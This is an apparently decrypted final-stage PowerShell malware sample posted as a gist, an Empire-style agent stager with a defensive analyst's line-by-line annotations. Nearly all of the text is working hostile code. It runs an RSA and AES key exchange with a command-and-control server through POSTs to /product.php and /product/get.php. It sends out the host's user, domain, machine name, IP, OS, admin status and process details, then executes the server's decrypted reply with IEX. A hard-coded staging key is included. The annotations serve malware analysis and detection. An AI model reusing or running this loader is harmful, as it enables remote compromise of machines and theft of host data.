
@JohnHammond
Created August 19, 2021 18:27
final_stage_powershell.ps1 after decryption
# Analyst annotation (defensive read of a decrypted sample): Start-Negotiate is
# the key-exchange and first check-in routine of an Empire-style PowerShell
# agent (the last statement hands off to Invoke-Empire). The server's reply to
# the second POST is decrypted and executed with IEX, so everything after that
# line depends on code that is not in this file. Mixed-case identifiers are an
# artefact of how the sample was delivered; PowerShell is case-insensitive, so
# they do not change behaviour.
# Parameters: $s = server base URL (both POST targets are built from it);
#   $SK = staging key string, used as AES / HMAC / RC4 key material;
#   $UA = User-Agent header value (defaults to a Chrome 91 / Windows 10 string);
#   $hOp = value sent in the "Hop-Name" request header on the second POST.
FunctioN StARt-NEgOTiAte {
PaRaM($s,$SK,$UA='MOZiLlA/5.0 (WiNdOWS NT 10.0; WIN64; X64) APPleWeBKiT/537.36 (KHTML, LIke GEcKo) CHrome/91.0.4472.124 SAFArI/537.36',$hOp)
# RC4 as a pipeline function: BEGIN runs the key-scheduling pass over a 256-byte
# state with key $RCK; PROCESS emits one byte per input byte, XORed with the
# keystream. The state ($STR, $I, $J) lives only for one pipeline invocation.
fUnctiON COnvErTTO-RC4ByTESTReAM {
PArAM ($RCK, $In)
BeGiN {
[BYtE[]] $STR = 0..255;
$J = 0;
# Key scheduling: swap state bytes driven by the key, indexed modulo key length.
0..255 | FOREAch-OBjeCT {
$J = ($J + $StR[$_] + $RCK[$_ % $RCK.LEngTh]) % 256;
$StR[$_], $STR[$J] = $Str[$J], $STr[$_];
};
$I = $J = 0;
}PRocesS {
# Keystream generation; the XOR result is written to the pipeline, not stored.
FoREAcH($BytE iN $In) {
$I = ($I + 1) % 256;
$J = ($J + $Str[$I]) % 256;
$StR[$I], $Str[$J] = $STr[$J], $Str[$I];
$BYTE -bxOr $StR[($Str[$I] + $StR[$J]) % 256];
}
}
}
# Verifies and decrypts a server message laid out as
#   [16-byte IV][AES-CBC ciphertext][10-byte truncated HMAC-SHA256 trailer].
# $Key is a string; its ASCII bytes key both the HMAC check and AES.
# Returns nothing when the input is 32 bytes or shorter or when the trailer
# does not verify; otherwise returns the decrypted bytes.
functiOn DEcRYpt-BYtes {
paraM ($Key, $IN)
IF($IN.LeNgtH -gt 32) {
$HMAC = New-ObJeCt SyStem.SEcurIty.CRYPtogRaPHy.HMACSHA256;
$E=[System.TexT.ENCodinG]::ASCII;
# Last 10 bytes are the MAC; everything before them is what the MAC covers.
$MAc = $In[-10..-1];
$In = $IN[0..($In.LenGtH - 11)];
$Hmac.KEY = $E.GeTByTES($KEY);
$ExPECTeD = $hmAc.ComPUtEHaSH($IN)[0..9];
# Compare-Object with no differences yields an empty array; any difference
# means the trailer did not verify and the function returns nothing.
if (@(COmPArE-ObJEcT $MaC $EXPECTED -SynC 0).LeNGth -NE 0) {
REtURn;
}
$IV = $In[0..15];
# AesCryptoServiceProvider first, RijndaelManaged as a fallback if the former
# cannot be instantiated on this runtime.
Try {
$AES=NeW-OBJect SySteM.SecuRiTY.CRYPtOGRAphY.AeSCrYptoSERviCeProvIdER;
}CaTCh {
$AES=NeW-ObJecT SYsTEM.SEcuRiTY.CRYPToGrapHY.RijndaelManaGeD;
}
$AES.Mode = "CBC";
$AES.KEY = $E.GEtByTEs($KEY);
$AES.IV = $IV;
# Ciphertext starts after the IV; the length passed excludes those 16 bytes.
($AES.CREaTeDecrYpTOr()).TransformFiNALBlock(($IN[16..$In.LeNGth]), 0, $IN.LeNgtH-16)
}
}
# --- Stage 1: build the RSA key-exchange message ---------------------------
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
# All errors below are suppressed, so failures surface only as missing or odd
# values in the data that is sent, never as a visible exception.
$ErrorActionPreference = "SilentlyContinue";
$e=[SYSTEm.TexT.ENCOdING]::UTF8;
# Hard-coded empty here, which makes both "custom header" loops below dead
# code in this sample.
$customHeaders = "";
$SKB=$E.GeTByTes($SK);
try {
$AES=NeW-ObJEct SyStEm.SecuriTy.CRypTographY.AESCRYPTOSERVIcEPROViDER;
}CaTCH {
$AES=New-ObJeCt SysTem.SECURItY.CRYptOGRApHy.RijNdAELManaGEd;
}
# AES-CBC keyed with the staging key; 16 IV bytes drawn with Get-Random.
$IV = [bYte] 0..255 | GeT-RANDoM -CouNt 16;
$AES.Mode="CBC";
$AES.Key=$SKB;
$AES.IV = $IV;
$HMac = NeW-ObJEct SyStEM.SecuriTy.CRYpTOGRAPHy.HMACSHA256;
$hmAc.Key = $SKB;
# A fresh 2048-bit RSA key pair is created in the machine key store
# (UseMacHineKeyStore); a key container left behind on the host is a useful
# forensic artefact. $Rk is the public half as XML (ToXmlString($false)
# omits the private parameters).
$CSp = NeW-OBjEct SYSTEM.SecUriTY.CryptOGRAphY.CSpPARamEters;
$cSp.FlAGs = $CSp.FLaGS -bOr [SysTem.SecuRitY.CrYpToGRaPHy.CSpPRoVIDerFlags]::UsEMacHinEKEySTore;
$rS = NeW-ObJEct SysTEm.SeCURItY.CRYpTOGrAPhY.RSACrYPtoServIcEPrOVidEr -ARGuMENTLIST 2048,$csp;
$Rk=$rS.ToXmLStRiNG($FalSe);
# Eight-character session ID drawn from an alphabet without I, J, O, Q, 0.
$ID=-join("ABCDEFGHKLMNPRSTUVWXYZ123456789".ToCharArray()|Get-Random -Count 8);
$IB=$E.gEtbytEs($Rk);
# $eb = IV || AES-CBC(public-key XML) || first 10 bytes of HMAC-SHA256($eb).
$eb=$IV+$AES.CReATeENCRYPTOR().TraNSfORmFINALBlOCK($Ib,0,$Ib.LENGTh);
$eB=$eB+$HMac.COMPuteHasH($eb)[0..9];
# WebClient using the system proxy with default (current-user) credentials,
# unless a $WC already exists in scope; $Script:Proxy, if set, overrides the
# proxy. $WC is not assigned earlier in this function, so the branch is taken
# unless a caller's scope provides one.
IF(-nOT $WC) {
$wC=NEW-ObJEct SySTem.Net.WebCLIeNt;
$Wc.PROXY = [SYSTEm.NEt.WeBReQuEST]::GeTSYStemWebProxY();
$wC.PRoXY.CrEDENtiaLS = [SYsTem.Net.CrEdenTiAlCacHE]::DeFAUlTCRedeNtiAls;
}
iF ($SCRIpt:PrOxy) {
$wC.PRoXy = $SCrIpT:ProXy;
}
# Dead as written ($customHeaders is ""). Would split "key:value,key:value"
# into request headers; a "host" header also triggers a discarded GET of $s.
if ($customHeaders -ne "") {
$HEaderS = $cUsToMHeaDERs -SPLIT ',';
$HeaDerS | FOREAcH-ObjEcT {
$hEaDeRKey = $_.SPLIt(':')[0];
$hEaDeRVaLUe = $_.SPLiT(':')[1];
if ($headerKey -eq "host"){
TRY{
$iG=$WC.DOWNLoADDAtA($S)
}caTch{}
};
$wc.HeaDeRs.Add($hEAdErKeY, $heaDeRValue);
}
}
# Routing packet for the key-exchange POST: 4 random bytes act as the RC4 IV;
# RC4(IV || staging key) wraps [session ID][0x01,0x02,0x00,0x00][len($eb),
# 4 bytes]; $eb follows. Network artefact: POST to <server>/product.php with
# the configured User-Agent.
$wc.Headers.Add("User-Agent",$UA);
$IV=[BItCOnVeRTEr]::GetBYTEs($(GeT-RaNdOM));
$DATa = $e.geTBYTEs($ID) + @(0x01,0x02,0X00,0x00) + [BITCONVERTeR]::GetByTES($eB.LenGth);
$rc4p = CoNVERTTO-RC4ByTEStREaM -RCK $($IV+$SKB) -IN $Data;
$rC4P = $IV + $rC4p + $Eb;
$raw=$wc.UploadData($s+"/product.php","POST",$rc4p);
# --- Stage 2: recover the session key from the RSA-encrypted reply ---------
# The reply is decrypted with the private key generated above ($false selects
# PKCS#1 v1.5 padding). The decoded text is 16 characters of nonce followed by
# the session key; the nonce is sent back incremented by one.
$de=$e.GEtSTRiNG($RS.DEcRypt($rAW,$falSe));
$nonCe=$De[0..15] -JOiN '';
$Key=$dE[16..$DE.LenGTh] -JoIN '';
$noncE=[StRinG]([lOnG]$NOnCE + 1);
# New AES-CBC instance keyed with the session key and a fresh IV.
tRY {
$AES=NeW-OBJEcT System.SECUrIty.CrYPToGraPhY.AeSCRYpToSErVICePROviDer;
}caTCh {
$AES=NEW-ObJecT SySTem.SEcUrIty.CRYptoGRaphy.RIjnDAElMANAGed;
}
$IV = [Byte] 0..255 | GET-RaNDOm -COUNT 16;
$AES.Mode="CBC";
$AES.Key=$e.GetBYteS($KEy);
$AES.IV = $IV;
# --- Stage 3: host check-in ------------------------------------------------
# Pipe-separated fields, in order: nonce+1 | server URL | user domain |
# user name | machine name | IP | OS name | elevated? | process name | PID |
# "powershell" | PS major version. This is the host data that leaves the
# machine (encrypted) on the second POST.
$I=$nONce+'|'+$S+'|'+[ENVIrOnMeNT]::USeRDoMainNAME+'|'+[EnvirONMent]::UsERNaME+'|'+[ENViRonmENt]::MACHiNENAmE;
# IP address via WMI; "[FAILED]" on error.
trY{
$P=(gwmI WIn32_NeTworkAdApTeRCoNFiGurAtion|WheRE{ $_.IPAdDrEsS}|SELEcT -ExpAnd IPAddRess);
}CaTCH {
$p = "[FAILED]"
}
# Hashtable indexed by a boolean: yields $p[0] when $P.Length is below 6,
# otherwise $P itself (presumably first element of an array versus a single
# string — confirm against the WMI return shape).
$IP = @{
$TRUe=$p[0];
$FaLse=$P
}[$P.LEnGTH -lT 6];
iF(!$ip -or $ip.tRIM() -Eq '') {
$Ip='0.0.0.0'
};
$i+="|$ip";
# OS name is the part of Win32_OperatingSystem.Name before the first '|'.
TrY{
$i+='|'+(GeT-WmIObjeCT WIN32_OPEratiNGSYSTEM).NaME.SplIT('|')[0];
}
CAtch{
$I+='|'+'[FAILED]'
}
# Elevation: literal "True" when running as SYSTEM, otherwise the result of
# an Administrator role check on the current Windows identity.
if(([Environment]::UserName).ToLower() -eq "system"){
$i+="|True"
}else {
$i += '|' +([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
}
$N=[SYsTeM.DiAGnOstICs.PrOCEsS]::GetCURReNTProCEss();
$I+='|'+$n.PRocEssNAMe+'|'+$N.Id;
$i += "|powershell|" + $PSVersionTable.PSVersion.Major;
# Encrypt the check-in with the session AES key; the HMAC instance created
# earlier is re-keyed with the session key for the 10-byte trailer.
$Ib2=$e.GETbYTES($I);
$Eb2=$IV+$AES.CReatEEncrYpTor().TranSformFiNAlBLOCk($IB2,0,$iB2.LeNgtH);
$HMAC.KEy = $e.GETByTeS($Key);
$EB2 = $eB2+$HMaC.CoMPuteHAsH($Eb2)[0..9];
# Same routing-packet wrapping as stage 1, with type bytes 0x01,0x03.
$IV2=[BitConVerTeR]::GEtBYtes($(GeT-RanDoM));
$DaTa2 = $E.GeTbyTeS($ID) + @(0x01,0x03,0X00,0x00) + [BitCONverTeR]::GEtBYTES($EB2.LeNGTH);
$rC4P2 = ConVeRtTO-RC4BYTeSTReAM -RCK $($IV2+$SKB) -IN $DAtA2;
$RC4p2 = $IV2 + $RC4P2 + $eb2;
# Second custom-header loop, identical to the first and equally dead as written.
if ($customHeaders -ne "") {
$hEadeRS = $cuStOmHEaDERs -sPliT ',';
$HEadERs | FOREAch-ObjEct {
$HeaDErKEY = $_.SPLit(':')[0];
$HeAderVAlue = $_.sPliT(':')[1];
if ($headerKey -eq "host"){
tRY{
$ig=$WC.DOwNloAdDAta($s)
}CATCH{}
};
$Wc.HEaDeRS.Add($HeadErKEy, $HEadERValUE);
}
}
# Second POST: <server>/product/get.php with User-Agent and Hop-Name headers
# (both header names and the path are observable network artefacts).
$wc.Headers.Add("User-Agent",$UA);
$wc.Headers.Add("Hop-Name",$hop);
$raw=$wc.UploadData($s+"/product/get.php","POST",$rc4p2);
# The verified, decrypted server response is executed directly. Invoke-Empire
# below is not defined in this file and is presumably supplied by that stage.
IEX $( $e.GETSTRiNG($(DecrypT-ByTEs -Key $KeY -IN $RaW)) );
# Variable cleanup. The WORKING_HOURS_REPLACE / REPLACE_KILLDATE strings are
# unsubstituted template placeholders in this sample.
$AES=$nULl;
$s2=$NuLL;
$wc=$nULL;
$eb2=$Null;
$rAW=$nULl;
$IV=$NuLL;
$Wc=$NuLl;
$i=$NUll;
$ib2=$nuLl;
[GC]::CollEcT();
Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy;
}
# Entry call. $ser, $u and $hop are not defined in this file; they are
# presumably set by the earlier stage that decrypted this script (confirm
# against the preceding stage). The staging key is hard-coded in the sample.
Start-Negotiate -s "$ser" -SK 'o=^@H*v#qh(jNBt%X]MpTbQZ&[_-.)J?' -UA $u -hop "$hop"